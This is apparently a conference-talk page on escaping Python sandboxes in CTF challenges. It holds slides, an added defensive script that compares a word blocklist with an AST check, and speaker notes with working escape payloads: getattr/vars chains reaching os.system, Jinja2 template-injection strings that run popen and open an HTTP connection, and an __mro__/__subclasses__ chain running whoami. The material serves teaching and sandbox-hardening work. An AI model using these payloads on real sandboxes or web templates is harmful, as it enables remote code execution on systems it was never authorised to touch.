Escaping the python sandbox

There are two things I really like: Capture the Flag competitions and Python.
Fortunately, I have found out that there are challenges that combine both.
In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF.
I will explain the difficulties of creating a Python sandbox and I will show the security issues in the wild.

Things you will learn from my session:
* Why a Python sandbox is a bad idea
* How to exploit a Python sandbox using knowledge of the Python language to execute code remotely
* Why it’s hard to protect Python from code execution using a Web Application Firewall
* At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities

Escaping the python sandbox

  1. @realgam3 • https://linkedin.com/in/realgam3 • https://github.com/realgam3
  2. Objects
  3. from __future__ import print_function
     # Python 2: keys() returns a list, so it can be trimmed and iterated
     targets = __builtins__.__dict__.keys()
     # keep only the two builtins the shell itself needs
     targets.remove('raw_input')
     targets.remove('print')
     # remove every other builtin from the interpreter
     for x in targets:
         del __builtins__.__dict__[x]
  4. banned = [
         "import", "exec", "eval", "pickle", "os", "subprocess",
         "kevin sucks", "input", "banned", "cry sum more", "sys"
     ]
  5. Links
     • http://pyconil2018.realgame.co.il
     • https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-5-PySandbox.pdf
     • https://github.com/vstinner/pysandbox
     • https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html
  6. If You Really Like CTF Challenges
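Added example (not code from the talk, its slides or its notes): slides 3 and 4 show two sandbox designs, stripping builtins and a word blocklist. The script below puts the slide-4 word list next to a structural check that parses the submitted source with the ast module and refuses dunder attribute access, a set of dangerous builtin names and import statements, then runs both over a benign line and the two escape chains quoted from the speaker notes. BANNED_WORDS is copied from slide 4; DENIED_NAMES, the function names and the sample inputs are assumptions made for this example.

```python
import ast

# Slide 4's word list, copied from the talk (joke entries included).
BANNED_WORDS = ["import", "exec", "eval", "pickle", "os", "subprocess",
                "kevin sucks", "input", "banned", "cry sum more", "sys"]

# Names the AST check refuses outright. This set is an assumption for the
# example, not a list from the talk.
DENIED_NAMES = {"getattr", "setattr", "delattr", "vars", "globals", "locals",
                "eval", "exec", "compile", "__import__", "__builtins__", "open"}

# Constructed inputs: one benign line plus two payloads quoted from the
# talk's speaker notes (the Secure Pyshell chain and the __mro__ chain).
SAMPLES = {
    "benign": "print(sum([1, 2, 3]))",
    "getattr_chain": 'getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls")',
    "mro_chain": ('"".__class__.__mro__[-1].__subclasses__()[59].__init__'
                  ".func_globals[\"linecache\"].__dict__['o' + 's']"
                  ".__dict__['s%stem' % 'ys']('whoami')"),
}


def blocklist_verdict(source):
    """Slide-4 approach: refuse the input if any banned word occurs as a
    substring. Returns (allowed, list_of_matched_words)."""
    hits = [word for word in BANNED_WORDS if word in source]
    return (len(hits) == 0, hits)


def ast_verdict(source):
    """Structural check: parse the input and refuse dunder attribute access,
    denied builtin names and import statements. Because it inspects the
    syntax tree, spelling a name as "va"+"rs" or 'o'+'s' changes nothing:
    what matters is where the value is used, not how the string was built.
    Returns (allowed, list_of_reasons)."""
    try:
        tree = ast.parse(source, mode="exec")
    except SyntaxError as err:
        return (False, ["syntax error: %s" % err])
    reasons = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            reasons.append("dunder attribute %s" % node.attr)
        elif isinstance(node, ast.Name) and node.id in DENIED_NAMES:
            reasons.append("denied name %s" % node.id)
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            reasons.append("import statement")
    return (len(reasons) == 0, reasons)


def compare(samples=SAMPLES):
    """Run both checks over every sample; returns {name: (blocklist_ok, ast_ok)}."""
    return {name: (blocklist_verdict(src)[0], ast_verdict(src)[0])
            for name, src in samples.items()}


if __name__ == "__main__":
    for name, (bl_ok, ast_ok) in compare().items():
        print("%-14s blocklist=%-5s ast=%s" % (name, bl_ok, ast_ok))
    # the __mro__ chain passes the word list (no banned substring in it)
    # but is refused by the AST check on its first __class__ access
```

The word list catches the getattr chain only because "os" and the "sys" inside "system" happen to appear as substrings; the __mro__ chain from the notes contains none of the banned words and sails through, which is the talk's point about filtering at the WAF level. The AST check refuses both chains at the first dunder attribute or denied name, so it is a better detection layer, but it still only recognises the shapes it was written for; the talk's thesis that an in-process Python sandbox is a bad idea is unchanged, and untrusted code belongs in a separate process or container with OS-level restrictions, not behind a filter.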

Editor's Notes

  • My name is Tomer Zait and I'm a security researcher at F5 Networks.
    I'm a practical software engineer and offensive security expert.
    I love CTFs and writing open source software.

    By the way, you are welcome to contribute code, or follow me on Twitter or GitHub.
  • Secure Pyshell:
    print('')
    print("")
    print(".")
    print(open)
    print(__file__)
    print(open(__file__))
    print(getattr(open(__file__),"read"))
    print(getattr(open(__file__),"read")())

    print(__builtins__)
    print(dir(__builtins__))
    print(getattr(__builtins__,"vars"))
    print(getattr(__builtins__,"va"+"rs"))
    print(getattr(__builtins__,"va"+"rs")())
    print(getattr(__builtins__,"va"+"rs")()["os"])
    print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
    print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
  • Zumbo 3:
    {{1+1}}
    {{request.environ}}
    {{config}}
    {%set a = 1+2%}{{a}}
    {{config.__class__.__init__.__globals__}}
    {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

    {{[].__class__.__base__.__subclasses__()}}
    {{[].__class__.__base__.__subclasses__()[351]}}
    {%set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%}{%set r=c.request('GET', '/pysandbox.html')%}{{c.getresponse().read()}}

    http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
    https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
  • print("".__class__.__mro__)
    print("".__class__.__mro__[-1].__subclasses__())
    print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']('whoami'))
  • Ask:
    “What are the actual alternatives that omer simpson has?”